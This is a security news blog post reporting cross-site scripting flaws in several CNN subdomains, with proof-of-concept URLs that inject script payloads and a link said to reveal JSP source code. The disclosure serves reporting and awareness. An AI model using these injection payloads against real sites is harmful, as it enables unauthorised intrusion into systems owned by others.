E Hacking News [ EHN ] - The Best IT Security News | Hacker News

Subscribe to my RSS

EHN
Cyber Crime
Vulnerability
Malware
IT Security
Hacker News
Spam
Defacements
Database Leaked

Follow @EHackerNews

Showing posts with label Source Code disclosure vulnerability. Show all posts

An Information Security researcher has discovered multiple Cross Site scripting vulnerability that affects one of the Top News channel website, CNN.

Few days back, The vulnerability was reported by Quister Tow. The vulnerabilities resides in three different sub domain of CNN: searchapp.cnn.com, audience.cnn.com,dynamic.si.cnn.com.

POC:

1.http://dynamic.si.cnn.com/baseball/mlb/search/mlbPlayerSearchResults.jsp?searchName=<script>alert(/QuisterTow/)</script>

2.http://searchapp.cnn.com/weboffers/weboffers.jsp?itype=cnn&cid=cnn&text=&domains=;</script><script>alert(/QuisterTow/);</script>&csiID=csi3

3.http://audience.cnn.com/services/si/flow/scoreAlertManagement?_flowExecutionKey=<script>alert(/QuisterTow/)</script>

While i was verifying the XSS vulnerabilities, i found another critical security flaw in the website that expose the source code.

POC for JSP Source Code disclosure
http://sportsillustrated.cnn.com/baseball/mlb/search/mlbPlayerSearchResults.jsp

I have immediately reported CNN about the security flaw. But there is no response from their side and so i am publishing the details here.

Older Posts Home

Recent Posts
Comments

Sponsored Links

Become a Fan

Funded by

Cyber Security and Privacy Foundation:

EHacking news is funded by Cyber Security and Privacy Foundation.
http://cysecurity.org

Get Latest news at Your Email

Enter Your Email:

Add me in Google +

Subscribe to our RSS Feeds!

Follow Us on Twitter!

Sponsored Links:

Funny Forward Mails
Debugging Questions in Java

COPYRIGHT 2012 by EHN. | Read our Privacy Policy